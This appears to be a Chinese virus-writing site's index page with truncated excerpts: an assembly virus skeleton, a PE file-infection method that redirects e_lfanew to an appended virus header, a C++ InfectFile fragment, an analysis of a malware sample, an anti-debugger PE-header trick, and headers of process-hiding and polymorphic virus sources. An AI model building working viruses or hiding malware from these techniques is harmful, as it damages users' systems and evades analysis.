VX Z0ne

以前写的，比较适合科普
.386
.model flat,stdcall
option casemap:none

include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib

VirusSize equ (offset virus_end - offset virus_start)

实验性质的东西
仍然属于bind infection的一种，只不过他是把宿主文件的e_lfanew指向了后面病毒PE的PE HEADER，我测试了一下，如果PE HEADER的SizeOfHeaders大于4k的话程序就不能被load，也就是说宿主程序大小+病毒的所有头大小+病毒的节表大小不能大于4K，这样的话这种感染方式就没有实用价值了。
以上说法如有错误，请批评指正嘿嘿～
BOOL CInfection::InfectFile(LPCTSTR lpVirus, LPCTSTR lpHost)
{
CFileMap fm(lpHost) ;

DWORD dwHostSize = fm.GetSize() ;

if (0 == dwHos...

【分析环境】VMWARE+WINDOWS XP SP2+OLLYDBG+PEID+PEInfo
首先用PEID扫描一下没有扫描出壳或者编译器特征，入口点RVA是0x70000,进一步使用PE分析工具查看关键的数据信息，我这里使用的是PEInfo：可以看到，代码入口不是在常规的.text节里而是在.rdata节里
再看输入表信息：输入表的RVA是0x70660,程序只导入了kernel32.dll里的GetProcAddress和LoadLibraryA这两个函数。

下面是详细的代码分析：

; 重定位到当前导入表
00470005 68 90184000 PUSH QQLiveUp.00401890
0047000A E8 71020000 CALL QQLiveUp.00470280

以前分析一些病毒和壳的时候经常会遇到这个程序可以正常执行，却用OD加载不了。一直怀疑是手工修改了PE的某个字段，但不确定是修改了哪一个。昨天在DEBUGMAN上问了一下，果然牛人很多
原来是修改了NumOfRvaAndSizes字段，一般情况下都是0x10

...

/*
##################################################################
   HideProc.C

   Author   :robinh00d[F-13 Lab]
   Email    :cr4zyexpl0rer_at_gmail.com
   HomePage   :http://cr4zyexpl0rer.googlepages.com
   Last Updated :2006-03-23
   个人练习之作，都是几年前的老技术了
&nb...

快来测试一下你的人品吧！

未完成，敬请期待~
;-------------------------------------------------------------------------------------
;   ______________________
;   Win32.Poly.DarkRain
;    Robinh00d/F-13 Labs
;   ______________________
; __________
; 编译参数:
; __________
; ml /c /coff poly.asm
; link /subsystem:wi...